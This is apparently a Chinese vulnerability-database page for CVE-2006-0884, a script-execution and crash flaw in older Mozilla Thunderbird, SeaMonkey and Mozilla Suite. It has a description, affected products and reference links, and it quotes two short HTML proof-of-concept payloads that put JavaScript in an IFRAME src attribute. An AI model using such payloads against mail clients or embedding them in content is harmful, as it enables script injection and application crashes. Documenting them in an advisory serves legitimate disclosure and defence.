Mozilla Thunderbird IFRAME JavaScript执行及拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109796 漏洞类型 输入验证
发布时间 2006-02-22 更新时间 2007-09-05
CVE编号 CVE-2006-0884 CNNVD-ID CNNVD-200602-379
漏洞平台 Linux CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/27257
https://www.securityfocus.com/bid/16770
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-379
|漏洞详情
Thunderbird是一款功能强大的邮件客户端,支持IMAP和POP邮件协议及HTML邮件格式。Thunderbird对HTML格式邮件的处理上存在问题,远程攻击者可能利用此漏洞在客户端机器上执行恶意脚本代码。Thunderbird的WYSIWYG渲染引擎没有充分地过滤JavaScript脚本,允许向IFRAME标签的SRC属性中写入JavaScript。这可能导致即使禁用了JavaScript的话,在用户编辑邮件或回复邮件时也可执行脚本或导致拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/16770/info

Multiple Mozilla products are prone to a script-execution vulnerability. 

The vulnerability presents itself when an attacker supplies a specially crafted email to a user containing malicious script code in an IFRAME and the user tries to reply to the mail. Arbitrary JavaScript can be executed even if the user has disabled JavaScript execution in the client. 

The following mozilla products are vulnerable to this issue:
- Mozilla Thunderbird, versions prior to 1.5.0.2, and prior to 1.0.8
- Mozilla SeaMonkey, versions prior to 1.0.1
- Mozilla Suite, versions prior to 1.7.13

<html>
<body>
<iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe>
</body>
</html>

* Denial of service (application crash) :

<html>
<body>
<iframe src="javascript:parent.document.write('Found by www.sysdream.com
!')"></iframe>
</body>
</html>
|受影响的产品
Ubuntu Ubuntu Linux 5.10 powerpc Ubuntu Ubuntu Linux 5.10 i386 Ubuntu Ubuntu Linux 5.10 amd64 Ubuntu Ubuntu Linux 5.0 4 powerpc Ubuntu Ubuntu Linux 5.0 4 i386 Ubuntu Ubuntu
|参考资料

来源:BID
名称:16770
链接:http://www.securityfocus.com/bid/16770
来源:VUPEN
名称:ADV-2006-3749
链接:http://www.frsirt.com/english/advisories/2006/3749
来源:DEBIAN
名称:DSA-1051
链接:http://www.debian.org/security/2006/dsa-1051
来源:DEBIAN
名称:DSA-1046
链接:http://www.debian.org/security/2006/dsa-1046
来源:XF
名称:mozilla-inline-fwd-code-execution(25983)
链接:http://xforce.iss.net/xforce/xfdb/25983
来源:UBUNTU
名称:USN-276-1
链接:http://www.ubuntulinux.org/support/documentation/usn/usn-276-1
来源:HP
名称:HPSBUX02156
链接:http://www.securityfocus.com/archive/1/archive/1/446657/100/200/threaded
来源:HP
名称:HPSBUX02122
链接:http://www.securityfocus.com/archive/1/archive/1/438730/100/0/threaded
来源:FEDORA
名称:FLSA:189137-1
链接:http://www.securityfocus.com/archive/1/archive/1/436296/100/0/threaded
来源:BUGTRAQ
名称:20060222MozillaThunderbird:RemoteCodeExecution&DenialofService
链接:http://www.securityfocus.com/archive/1/archive/1/425786/100/0/threaded
来源:REDHAT
名称:RHSA-2006:0330
链接:http://www.redhat.com/support/errata/RHSA-2006-0330.html
来源:REDH